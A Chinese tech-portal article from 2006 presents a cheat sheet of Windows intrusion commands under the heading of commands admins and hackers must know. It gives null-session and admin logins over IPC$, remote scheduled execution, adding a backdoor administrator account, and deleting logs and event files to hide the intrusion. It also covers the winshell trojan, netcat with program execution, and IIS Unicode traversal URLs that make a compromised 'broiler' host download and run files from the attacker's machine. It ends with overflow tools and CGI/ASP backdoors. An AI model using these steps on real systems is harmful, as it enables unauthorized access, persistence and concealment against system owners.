通行证: 用户 密码
域名空间  下载中心 社区论坛 信息公告 my小屋
联系我们
设为首页
加入收藏
热门:qq挂机,asp,php,jsp,xml
,sql,.net,编程 程序 网页图象
首页>网络安全>黑客技术>正文 百度拟向个人用户收费 转移网易盛   google网站遭恶意仿冒 律师已开始   intelcore品牌明年推出 “奔腾”   ie暴出漏洞 google调整自家产品协   中国黑客群攻击美政府网站 拿到部   微软计划开放office文件格式 消除   腾讯联合八部门严厉打击挂机网站   神六载人飞行圆满成功   美国会要求nasa彻底完成空间站建   google中国研究院有望落户清华   
热 点 排 行
dll文件下载
qq挂机的n种快速方法
刘亦菲 变性人、堕胎,自称
双系统卸载完全攻略
长白山天池怪兽再现 一分钟
腾讯qq调整升级条件 不再诱
新开放qq免费挂级网站
qq挂级程序,qq免费挂机源程
扫描与破解adsl帐号
ape歌曲的播放、转换和刻录
“反间谍专家”试用手记
亲身体验!让桌面不再粗糙
exe文件打不开——恢复exe
用通通通作代理在局域网上
photoshop通道抠图:给秀发
推 荐 新 闻
微软发布巨型升级包 修正i
sql server 2005数据库镜像
易特网祝大家圣诞快乐
微软推多视角俯瞰城市地图
“老人参”变脸“后天” 伺
中国黑客群攻击美政府网站
bittorrent被好莱坞招安盗
网站建设中,关键词选择技
神六载人飞行圆满成功
国庆长假上网慎防“移动杀
连环起诉google 传统媒体欲
最强秘籍 ie7最新使用技巧
神六完成总装可接航天器 外
adobe ceo痛斥微软 称其管
微软急调张亚勤回中国 千里
相 关 新 闻
防治手机感冒彻底清查手机
本周“欢乐时光”“求职信
ie暴出漏洞 google调整自家
“老人参”变脸“后天” 伺
中国黑客群攻击美政府网站
网吧防毒杀毒维护有绝招
微软办公软件易受新木马攻
卡巴斯基杀毒软件存严重漏
国庆长假上网慎防“移动杀
恶性病毒假借“无敌音乐奖
黑客被“招安”从“地下黑
超女视频病毒现身 专家提醒
微软 fbi合作纠出zotob作者
黑客盯上论坛热门帖子
首页>网络安全>黑客技术>正文

网管和黑客都必须知道的命令


http://www.iyit.net  日期:2006-4-15 9:07:28  来源:不详  点击:
  常用的几条net命令: (与远程主机建立空管连接) net use \\ip地址\ipc$ "" /use:"" (以管理员身份登录远程主机) net use \\ip地址\ipc$ "密码" /use:"administrator" (传送文件到远程主机winnt目录下)copy 本机目录路径\程序 \\ip地址\admin$ (查看远程主机时间) net time \\ip地址 (定时启动某个程序) at \\ip地址 02:18 readme.exe (查看共享) net view \\ip地址 (查看netbios工作组列表) nbtstat -a ip地址 (将远程主机c盘映射为自己的f盘) net use f: \\ip地址\c$ ""/user:"administrator" (这两条把自己增加到管理员组): net user 用户名 密码 /add net localgroup administrators 用户名 /add (断开连接) net use \\ip地址\ipc$ /delete 扫尾: del c:\winnt\system32\logfiles\*.* del c:\winnt\ssytem32\config\*.evt del c:\winnt\system32\dtclog\*.* del c:\winnt\system32\*.log del c:\winnt\system32\*.txt del c:\winnt\*.txt del c:\winnt\*.log

一、netsvc.exe 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: netsvc /list \\ip地址 netsvc schedule \\ip地址 /query netsvc \\ip地址 schedule /start 二、opentelnet.exe 远程启动主机的telnet服务,并绑定端口到7878,例如: opentelnet \\ip地址 用户名 密码 1 7878 然后就可以telnet到主机的7878端口,进入dos方式下: telnet ip地址 7878 三、winshell.exe 一个非常小的木马(不到6k),telnet到主机的7878端口,输入密码winshell,当看到cmd>后,可打下面的命令: p path (查看winshell主程序的路径信息) b reboot (重新启动机器) d shutdown (关闭机器) s shell (执行后你就会看到可爱的“c:\>”) x exit (退出本次登录会话,此命令并不终止winshell的运行) cmd> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) 四、3389登陆器,gui方式登录远程主机的 五、elsave.exe 事件日志清除工具 elsave -s \\ip地址 -l "application" -c elsave -s \\ip地址 -l "system" -c elsave -s \\ip地址 -l "security" -c 执行后成功清除应用程序日志,系统日志,安全日志 六、hbulot.exe 开启win2kserver和winxp的3389服务 hbulot [/r] 使用/r表示安装完成后自动重起目标使设置生效。 七、nc.exe(netcat.exe) 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 想要连接到某处: nc [-options] hostname port[s] [ports] ... 绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 参数: -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 -g num source-routing pointer: 4, 8, 12, ... -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -n 指定数字的ip地址,不能用hostname -o file 记录16进制的传输 -p port 本地端口号 -r 任意指定本地及远程端口 -s addr 本地源地址 -u udp模式 -v 详细输出——用两个-v可得到更详细的内容 -w secs timeout的时间 -z 将输入输出关掉——用于扫描时 八、tftpd32.exe 把自己的电脑临时变为一台ftp服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用unicode漏洞或telnet到肉鸡,例如: http://ip地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机ip地址 get 文件名 c:\winnt\system32\文件名 然后可以直接令文件运行: http://ip地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 九、prihack.exe是iis的printer远程缓冲区溢出工具 idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有asp执行权限的目录。然后用ie浏览器连接。
上一篇:扫描与破解adsl帐号
下一篇:没有了

[发送给好友] [打印本页] [关闭窗口] [返回顶部] 转载请注明来源:http://www.iyit.net
特别声明: 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
责任编辑: 黑鹰 投稿作者: 黑鹰
信息来源: 不详 录入时间: 2006-4-15 9:07:28
浏览次数: 投稿信箱: shtghy@163.com
  友情链接
设置首页 - 版权声明 - 广告服务 - 关于我们 - 联系我们 - 友情连接
copyrights ?2004-2005 iyit.net all rights reserved.
网站合作、广告联系qq:147007642、466949678
易特网络技术 点击这里给我发消息